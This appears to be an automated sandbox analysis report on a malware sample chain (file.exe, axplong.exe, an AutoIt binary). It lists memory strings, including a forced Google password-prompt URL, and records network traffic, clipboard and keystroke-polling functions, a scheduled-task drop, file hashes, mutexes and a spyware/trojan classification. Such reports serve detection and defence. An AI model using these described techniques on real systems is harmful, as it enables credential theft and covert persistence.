Source: firefox.exe, 00000015.00000002.2936356785.000002593FD73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2921089355.000002593A9C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2921089355.000002593A9FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3129040244.00001841F5700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29EEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000015.00000002.2936356785.000002593FDA0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2923113526.000002593ABEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2920348338.000002593A87C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2822245342.000002593ABEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2937149751.000002593FE2A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2931474157.000002593B751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3103108635.000001EF300E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3099000605.000001EF2FA79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3099000605.000001EF2FA0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000015.00000003.2822245342.000002593ABBE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2921089355.000002593A940000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2879062103.0000025928311000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2921089355.000002593A9C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2892227537.0000025936085000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2817429232.00000259405D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2878827822.0000025928110000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2937149751.000002593FE2A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2931474157.000002593B751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2906919520.0000025938EF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867489559.000002ADC15B4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2866418794.000002ADC12FA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2866384916.000001CBE7790000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867179199.000001CBE79C4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2866384916.000001CBE779A000.00000004.00000020.00020000.00000000.sdmp, b29e59e54d.exe, 0000001A.00000003.2986668099.0000000001144000.00000004.00000020.00020000.00000000.sdmp, b29e59e54d.exe, 0000001A.00000002.3019948993.0000000001258000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.2992934080.0000012990C90000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000013.00000002.2737633129.0000026C7AD39000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2749353252.0000018ECDFF3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2878827822.0000025928119000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.2992934080.0000012990C99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000015.00000002.2878827822.0000025928119000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdD
Source: firefox.exe, 00000015.00000002.2879623730.0000025929BBA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2879623730.0000025929BF1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867489559.000002ADC15B4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2866418794.000002ADC12F0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2866384916.000001CBE7790000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867179199.000001CBE79C4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3050235794.000001EF1F7A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50064 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50065 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0095EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 8_2_0095EAFF
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0095ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_0095ED6A
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0095EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 8_2_0095EAFF
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0094AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 8_2_0094AA57
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00979576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 8_2_00979576

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: b29e59e54d.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: b29e59e54d.exe, 00000008.00000000.2703523532.00000000009A2000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_9b17ffbb-e
Source: b29e59e54d.exe, 00000008.00000000.2703523532.00000000009A2000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_1bb68971-1
Source: b29e59e54d.exe, 0000001A.00000000.2859812436.00000000009A2000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_1a1a1ea7-0
Source: b29e59e54d.exe, 0000001A.00000000.2859812436.00000000009A2000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_539b4c8d-1
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: 63371c25d6.exe.6.dr Static PE information: section name:
Source: 63371c25d6.exe.6.dr Static PE information: section name: .rsrc
Source: 63371c25d6.exe.6.dr Static PE information: section name: .idata
Source: 63371c25d6.exe.6.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 25_2_000001CBE7969337 NtQuerySystemInformation, 25_2_000001CBE7969337
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 25_2_000001CBE7982932 NtQuerySystemInformation, 25_2_000001CBE7982932
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0094D5EB: CreateFileW,DeviceIoControl,CloseHandle, 8_2_0094D5EB
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00941201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 8_2_00941201
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0094E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 8_2_0094E8F6
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_009DE440 6_2_009DE440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_009D4CF0 6_2_009D4CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00A13068 6_2_00A13068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00A07D83 6_2_00A07D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_009D4AF0 6_2_009D4AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00A1765B 6_2_00A1765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00A12BD0 6_2_00A12BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00A18720 6_2_00A18720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00A16F09 6_2_00A16F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00A1777B 6_2_00A1777B
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00952046 8_2_00952046
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008E8060 8_2_008E8060
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00948298 8_2_00948298
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0091E4FF 8_2_0091E4FF
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0091676B 8_2_0091676B
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00974873 8_2_00974873
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0090CAA0 8_2_0090CAA0
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008ECAF0 8_2_008ECAF0
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008FCC39 8_2_008FCC39
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00916DD9 8_2_00916DD9
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008E91C0 8_2_008E91C0
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008FB119 8_2_008FB119
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00901394 8_2_00901394
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00901706 8_2_00901706
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0090781B 8_2_0090781B
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_009019B0 8_2_009019B0
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008E7920 8_2_008E7920
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008F997D 8_2_008F997D
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00907A4A 8_2_00907A4A
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00907CA7 8_2_00907CA7
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00901C77 8_2_00901C77
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00919EEE 8_2_00919EEE
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0096BE44 8_2_0096BE44
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00901F32 8_2_00901F32
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 25_2_000001CBE7969337 25_2_000001CBE7969337
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 25_2_000001CBE7982932 25_2_000001CBE7982932
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 25_2_000001CBE798305C 25_2_000001CBE798305C
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 25_2_000001CBE7982972 25_2_000001CBE7982972
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe 101E5DD7863CC4CC10C084D7468F2BD81A77323F9FB49B4B5EBD6077A5552BA8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe 101E5DD7863CC4CC10C084D7468F2BD81A77323F9FB49B4B5EBD6077A5552BA8
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: String function: 008FF9F2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: String function: 00900A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: String function: 008E9CB3 appears 31 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9971634451634878
Source: file.exe Static PE information: Section: lfxcpyub ZLIB complexity 0.9942658327178729
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9971634451634878
Source: axplong.exe.0.dr Static PE information: Section: lfxcpyub ZLIB complexity 0.9942658327178729
Source: random[1].exe.6.dr Static PE information: Section: mmgyxokd ZLIB complexity 0.9948913375407166
Source: 63371c25d6.exe.6.dr Static PE information: Section: mmgyxokd ZLIB complexity 0.9948913375407166
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@83/18@34/9
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_009537B5 GetLastError,FormatMessageW, 8_2_009537B5
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_009410BF AdjustTokenPrivileges,CloseHandle, 8_2_009410BF
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_009416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 8_2_009416C3
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_009551CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 8_2_009551CD
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0094D4DC CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 8_2_0094D4DC
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0095648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 8_2_0095648E
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008E42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 8_2_008E42A2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3280:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3780:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2664:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
